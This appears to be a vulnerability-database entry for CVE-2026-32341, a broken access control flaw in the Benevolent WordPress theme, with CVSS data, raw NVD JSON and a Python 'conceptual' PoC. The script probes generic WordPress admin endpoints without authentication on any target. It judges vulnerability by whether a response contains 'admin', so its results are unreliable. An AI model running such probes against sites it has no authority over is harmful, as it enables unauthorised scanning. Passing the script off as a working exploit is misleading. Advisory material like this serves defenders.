Security Vulnerability Report
中文
CVE-2026-32341 CVSS 5.3 MEDIUM

CVE-2026-32341

Published: 2026-03-13 19:54:45
Last Modified: 2026-04-22 21:30:26

Description

Missing Authorization vulnerability in raratheme Benevolent benevolent allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Benevolent: from n/a through <= 1.3.9.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Benevolent Theme <= 1.3.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-32341 PoC - Benevolent Theme Broken Access Control # Target: WordPress sites with Benevolent theme <= 1.3.9 # Note: This is a conceptual PoC based on typical broken access control patterns import requests import sys def check_vulnerability(target_url): """ Check for broken access control vulnerability in Benevolent theme. This PoC attempts to access admin-level endpoints without authentication. """ # Common admin endpoints that might be accessible without auth endpoints = [ '/wp-admin/admin-ajax.php', '/wp-admin/admin.php?page=benevolent_options', '/wp-json/wp/v2/settings', '/wp-content/themes/benevolent/functions.php' ] headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'X-Requested-With': 'XMLHttpRequest' } print(f"[*] Testing target: {target_url}") print(f"[*] Vulnerability: CVE-2026-32341 - Benevolent Theme Broken Access Control\n") for endpoint in endpoints: url = target_url.rstrip('/') + endpoint try: response = requests.get(url, headers=headers, timeout=10, verify=False) # Check if we can access admin functionality without auth if response.status_code == 200 and 'admin' in response.text.lower(): print(f"[!] VULNERABLE: {url}") print(f" Status: {response.status_code}") print(f" Response length: {len(response.text)} bytes\n") else: print(f"[-] Protected: {url} (Status: {response.status_code})") except requests.RequestException as e: print(f"[!] Error testing {url}: {str(e)}") if __name__ == '__main__': if len(sys.argv) > 1: check_vulnerability(sys.argv[1]) else: print("Usage: python poc.py <target_url>") print("Example: python poc.py http://example.com")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32341", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:45.260", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in raratheme Benevolent benevolent allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Benevolent: from n/a through <= 1.3.9."}, {"lang": "es", "value": "Vulnerabilidad de Autorización Faltante en raratheme Benevolent benevolent permite Explotar Niveles de Seguridad de Control de Acceso Incorrectamente Configurados. Este problema afecta a Benevolent: desde n/a hasta &lt;= 1.3.9."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/benevolent/vulnerability/wordpress-benevolent-theme-1-3-9-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}